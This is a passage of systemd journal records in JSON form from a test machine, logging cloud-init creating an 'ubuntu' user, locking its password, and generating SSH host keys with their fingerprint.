sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'plugdev'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817311463" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=288;b=e2b08827b5804427b422c10c84f1567e;m=2909019;t=5bd16df540f80;x=6db6906e2b974e45", "__REALTIME_TIMESTAMP" : "1615280817311616", "__MONOTONIC_TIMESTAMP" : "43028505", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", 
"_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'lxd'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817311609" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=289;b=e2b08827b5804427b422c10c84f1567e;m=290909d;t=5bd16df541004;x=7439e56038c0c4bf", "__REALTIME_TIMESTAMP" : "1615280817311748", "__MONOTONIC_TIMESTAMP" : "43028637", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'netdev'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817311741" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=28a;b=e2b08827b5804427b422c10c84f1567e;m=2933baf;t=5bd16df56bb16;x=1b509b93a3ec76a9", "__REALTIME_TIMESTAMP" : "1615280817486614", "__MONOTONIC_TIMESTAMP" : "43203503", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", 
"_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "passwd", "SYSLOG_PID" : "740", "MESSAGE" : "password for 'ubuntu' changed by 'root'", "_PID" : "740", "_COMM" : "passwd", "_EXE" : "/usr/bin/passwd", "_CMDLINE" : "passwd -l ubuntu", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817486592" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=28b;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=5ca7bdd0ee6da0a6", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Generating public/private rsa key pair." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=28c;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2d2b08f02c587437", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your identification has been saved in /etc/ssh/ssh_host_rsa_key." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=28d;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=81dee9f6fe1e28cd", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your public key has been saved in /etc/ssh/ssh_host_rsa_key.pub." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=28e;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2faa7d692a908da5", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key fingerprint is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=28f;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=27784decd912f835", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "SHA256:yknRoTzFSZARXtHupUbaRHJq3cqluJqyPejk+7QaGXg root@test-1" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=290;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=547039c05140533d", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key's randomart image is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=291;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=673b6c2297980d5b", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+---[RSA 2048]----+" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=292;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2d550c1613250691", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| +B*+ |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=293;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=c654081db1fa9273", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| o.=+.+ |" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=294;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=f53676ea4700ae3c", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| * .B . |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=295;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=31ca3380fd6da014", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| . 
oo = + |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=296;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=ce99318b887eb5d2", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| . E ..SO * |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=297;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=10838fe541ff893b", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| . 
= oo O |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=298;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=c0e449122af7cdb4", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| +.= o |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=299;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=55377504886d45e3", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| oo+.o. 
|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=29a;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=23834d86ee1d4954", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| .***o |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=29b;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=bd50657e96b79a01", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+----[SHA256]-----+" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=29c;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=d4bb71a15fccef51", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Generating public/private dsa key pair." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=29d;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=d0a88cda53bddb19", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your identification has been saved in /etc/ssh/ssh_host_dsa_key." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=29e;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2a7073f3626f089b", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your public key has been saved in /etc/ssh/ssh_host_dsa_key.pub." 
